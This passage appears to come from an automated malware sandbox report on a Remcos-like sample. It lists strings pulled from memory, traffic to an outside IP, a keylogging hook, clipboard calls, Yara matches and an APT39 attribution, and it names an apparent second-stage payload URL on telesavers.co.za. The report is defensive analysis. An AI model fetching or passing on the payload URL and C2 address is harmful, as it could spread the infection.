Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
Source: asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000227D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819594967.000000000227D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
Source: asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819235993.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818583602.0000000002A86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
Source: asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eb2.3lift.com/sync?
Source: asXlZG3aW6.exe, 00000083.00000003.21818671304.0000000002A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
Source: asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822519040.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822858833.0000000002267000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819075063.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819011679.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ib.adnxs.com/async_usersync_file
Source: asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825595393.0000000002A97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/TI
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
Source: asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819011679.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
Source: asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: asXlZG3aW6.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826000488.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826100226.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818302780.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826484939.000000000225F000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822519040.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822858833.0000000002267000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818583602.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826258540.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826426317.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21826050494.000000000225C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827997656.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819075063.0000000002A86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
Source: asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
Source: asXlZG3aW6.exe, 00000083.00000003.21824645097.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824737604.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21824954221.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005230000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telesavers.co.za/
Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telesavers.co.za/EsbmqCxkb162.bin
Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telesavers.co.za/u
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: asXlZG3aW6.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/pagead/drt/ui
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api2/aframe
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: bhv2AA3.tmp.131.dr | String found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
Source: asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, bhv2AA3.tmp.131.dr | String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | HTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49735 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\asXlZG3aW6.exe
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 133_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 133_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud

Source: Yara match | File source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Conhost.exe | Process created: 99

System Summary

Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Dropped file: MD5: b38561661a7164e3bbb04edc3718fe89 | Family: Chafer | Alias: APT39, Chafer | Description: Chafer's (also known as APT39) focus on the telecommunications and travel industries suggests an intent to perform monitoring, tracking, or surveillance operations against specific individuals. While its targeting scope is global, the activities are concentrated in the Middle East. Its targeting of government entities suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. | References: https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html https://mp.weixin.qq.com/s/c2z4laJ0oq5y0BAEFM3Y9w | Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00401806 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_004018C0 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_004016FD NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_004017B7 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 133_2_00402CAC NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 133_2_00402D66 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
